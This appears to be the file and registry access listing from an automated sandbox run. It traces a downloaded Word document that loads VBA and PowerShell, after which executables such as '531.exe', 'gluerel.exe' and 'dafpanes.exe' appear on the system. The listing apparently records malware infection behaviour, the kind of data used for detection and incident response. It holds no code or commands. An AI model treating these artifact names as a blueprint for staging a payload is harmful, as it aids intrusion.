C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
\??\PIPE\srvsvc
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\
C:\Windows\sysnative\windowspowershell\v1.0\powershell_ise.exe
C:\Windows\sysnative\windowspowershell
C:\Windows\sysnative\WindowsPowerShell
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell_ise.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\
C:\Windows\hh.exe
C:\Windows\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BF9JT9UPQS3TEN97KVRT.temp
C:\Windows\sysnative\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework64\*
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe.config
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe.Local\
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\msvcr80.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_64\index169.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni.dll
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ole32.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\OLEAUT32.dll
C:\Windows\Globalization\en-gb.nlp
C:\Windows\Globalization\en-us.nlp
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.config
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.INI
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.INI
C:\Windows\sysnative\l_intl.nls
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.INI
C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.INI
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni.dll
C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.INI
C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.INI
C:\Windows\Globalization\en.nlp
C:\Windows\assembly\GAC_64\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.ConsoleHost.resources\Microsoft.PowerShell.ConsoleHost.resources.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en-US\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en-US\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\en\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni.dll
C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.INI
C:\Windows\assembly\GAC_64\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\System.Management.Automation.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\System.Management.Automation.resources\System.Management.Automation.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\types.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\WSMan.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Certificate.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Help.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Registry.format.ps1xml
C:\Windows\sysnative\tzres.dll
C:\Windows\assembly\GAC_64\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.WSMan.Management.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources\Microsoft.WSMan.Management.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.WSMan.Management.resources\Microsoft.WSMan.Management.resources.exe
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\secur32.dll
C:\Windows\assembly\GAC_64\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\assembly\GAC\Microsoft.PowerShell.Security.resources\1.0.0.0_en-US_31bf3856ad364e35
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources\Microsoft.PowerShell.Security.resources.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources.exe
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\Microsoft.PowerShell.Security.resources\Microsoft.PowerShell.Security.resources.exe
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni.dll
C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.INI
C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\profile.ps1
C:\Windows\sysnative\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1
C:\Users\user\Documents\WindowsPowerShell\profile.ps1
C:\Users\user\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\091b931d0f6408001747dbbbb05dbe66\System.Configuration.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI
C:\Users\user\531.exe
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\rasapi32.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ws2_32.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\winhttp.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\iphlpapi.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\security.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\shell32.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.308.14888764
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.308.14888764
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.308.14888764
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp
C:\Windows\ServiceProfiles
C:\Windows\ServiceProfiles\NetworkService
C:\Windows\sysnative\bthserv.dll
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\osppobjs-spp-plugin-manifest-signed.xrm-ms
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPOBJS.DLL
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\DNSAPI.dll
C:\Windows\sysnative\dnsapi.dll
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat.bak
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat
C:
\??\PhysicalDrive0
\??\pci#ven_8086&dev_100f&subsys_075015ad&rev_01#4&3ad87e0a&0&0888#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{6aee89dd-bcbc-4329-b07b-c7eec7efd7ec}
\??\root#*6to4mp#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{fe09e92d-e089-4750-ba5d-f1dc277d4029}
\??\root#*isatap#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{20ae6bf1-f960-4e04-a1f8-4706fc316b77}
\??\root#ms_agilevpnminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{29898c9d-b0a4-4fef-bdb6-57a562022cee}
\??\root#ms_l2tpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{e43d242b-9eab-4626-a952-46649fbb939a}
\??\root#ms_ndiswanbh#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanbh
\??\root#ms_ndiswanip#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanip
\??\root#ms_ndiswanipv6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanipv6
\??\root#ms_pppoeminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{8e301a52-affa-4f49-b9ca-c79096a1a056}
\??\root#ms_pptpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{df4a9d2c-8742-4eb1-8703-d395c4183f33}
\??\root#ms_sstpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{71f897d7-eb7c-4d8d-89db-ac80d9dd2270}
\??\root#system#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{eeab7790-c514-11d1-b42b-00805fc1270e}&asyncmac
\??\sw#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{78032b7e-4968-42d3-9f37-287ea86c0aaa}
C:\Windows\sysnative\Tasks\OfficeSoftwareProtectionPlatform
C:\Windows\sysnative\Tasks\OfficeSoftwareProtectionPlatform\*
C:\Windows\sysnative\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask
\Device\LanmanDatagramReceiver
C:\Windows\SysWOW64\sc.exe
C:\Windows\SysWOW64\*.*
C:\Windows\SysWOW64\en-US\sc.exe.mui
C:\Windows\SysWOW64\ui\SwDRM.dll
C:\Windows\SysWOW64\gluerel.exe
C:\Windows\appcompat\Programs\RecentFileCache.bcf
C:\Windows\SysWOW64\dafpanes.exe
C:\Windows\SysWOW64\gluerel.exe:Zone.Identifier
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7531C624-7656-11E9-A15D-000C29BA3DA7}.dat
C:\Program Files (x86)\Internet Explorer\ieproxy.dll
C:\Users\user\AppData\Local\Temp\~DF80447823E3B1CDC0.TMP
C:\Windows\System32\url.dll
C:\
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
C:\Users
C:\Users\user
C:\Users\user\Favorites\desktop.ini
C:\Users\user\Desktop\desktop.ini
C:\Users\user\Favorites
C:\Users\user\Favorites\Links\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\frameiconcache.dat
C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
C:\Windows\SysWOW64\en-US\MSCTF.dll.mui
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7531C625-7656-11E9-A15D-000C29BA3DA7}.dat
C:\Users\user\AppData\Local\Temp\~DF3CDA1F11F8A81DB4.TMP
C:\Users\user\Favorites\Links
C:\Windows\SysWOW64\ieframe.dll
C:\Windows\SysWOW64\stdole2.tlb
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Program Files (x86)\Internet Explorer\IEShims.dll
C:\Windows\SysWOW64\shell32.dll
C:\Program Files (x86)\Internet Explorer\sqmapi.dll
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\index.dat
C:\Windows\Fonts\staticcache.dat
C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
C:\Windows\AppPatch\sysmain.sdb
C:\Program Files (x86)\Microsoft Office\Office14\
C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
\??\PIPE\samr
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\comctl32.dll.mui
C:\Windows\Installer\{90140000-003D-0000-0000-0000000FF1CE}\wordicon.exe
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc
C:\Program Files (x86)\Windows Defender\MpClient.dll
C:\Program Files (x86)\Windows Defender\MsMpLics.dll
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc:Zone.Identifier
C:\Users\user\Searches\desktop.ini
C:\Users\user\Videos\desktop.ini
C:\Users\user\Pictures\desktop.ini
C:\Users\user\Contacts\desktop.ini
C:\Users\user\Music\desktop.ini
C:\Users\user\Downloads\desktop.ini
C:\Users\user\Documents\desktop.ini
C:\Users\user\Links\desktop.ini
C:\Users\user\Saved Games\desktop.ini
C:\Windows\System32\shdocvw.dll
C:\Windows\System32\
C:\Windows\System32\en-US\shdocvw.dll.mui
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Windows\winsxs\FileMaps\program_files_x86_microsoft_office_office14_295527d9bd5a393d.cdf-ms
C:\Windows\AppPatch\pcamain.sdb
C:\Users\Public\desktop.ini
C:\Users\Public
C:\Users\Public\Desktop\desktop.ini
C:\Users\user\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Links
C:\Windows\sysnative\ieframe.dll
C:\Users\user\{1777F761-68AD-4D8A-87BD-30B759FA33DD}
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
C:\Program Files (x86)\desktop.ini
C:\Program Files (x86)\Internet Explorer\iexplore.exe.Manifest
C:\program files (x86)\internet explorer\iexplore.exe
C:\program files (x86)\internet explorer\en-US\iexplore.exe.mui
C:\Windows\Branding\ShellBrd\shellbrd.dll
C:\Users\user\Desktop
C:\Users\Public\Desktop
C:\Users\user\AppData
C:\Users\user\AppData\Roaming
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\ProgramData
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE.3.Manifest
C:\Program Files (x86)\Microsoft Office\Office14\WWLIB.DLL
C:\Program Files (x86)\Microsoft Office\Office14\GFX.DLL
C:\Windows\System32\wtsapi32.dll
C:\Windows\System32\msimg32.dll
C:\Program Files (x86)\Microsoft Office\Office14\OART.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSO.DLL
C:\Windows\System32\msi.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\
C:\Users\user\AppData\Local\Temp\CVR867E.tmp
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
C:\Program Files (x86)\Microsoft Office\Office14\1033\WWINTL.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\1033\MSOINTL.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSORES.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\RICHED20.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE.config
C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC.DLL
C:\Users\user\AppData\Roaming\Microsoft\Templates
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C39F9907-C8C6-4EF6-94D3-79DF1B9337A2}.tmp
C:\Users\user\AppData\Local\Microsoft\Office\Word14.customUI
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Microsoft
C:\Users\user\AppData\Local\Microsoft\Windows
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC
C:\Users\user\AppData\Local\Temp\~DFABD4D4152FD0DE55.TMP
C:\Program Files (x86)\Microsoft Office\Office14\GKWord.dll
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{22959652-52D5-44BE-B483-E544AA5735B7}.tmp
C:\Users\user\AppData\Roaming\Microsoft\Office\review.rcd
C:\Users\user\AppData\Roaming\Microsoft\Office\adhoc.rcd
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\USP10.DLL
C:\Program Files (x86)\Microsoft Office\Office14\MSWORD.OLB
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\VBE7.DLL
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBE7INTL.DLL
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0960D407-C226-4B14-8EF4-4D7DE39EC6D6}.tmp
C:\Windows\SysWOW64\FM20.DLL
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\VBE7.DLL\3
C:\Users\user\AppData\Local\Temp\Word8.0\MSForms.exd
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8588CCBC.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47E14D8D.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE1C1E2A.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8C4423.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AB067C8.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\66D6F529.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF99C916.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7413FA1F.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47B30D94.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EF4A885.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F28E8CC2.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC4471DB.wmf
C:\Windows\System32\wbem\wbemdisp.tlb
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
C:\Windows\Fonts\arial.ttf
C:\Windows\Fonts\arialbd.ttf
C:\Windows\Fonts\ariali.ttf
C:\Windows\Fonts\arialbi.ttf
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
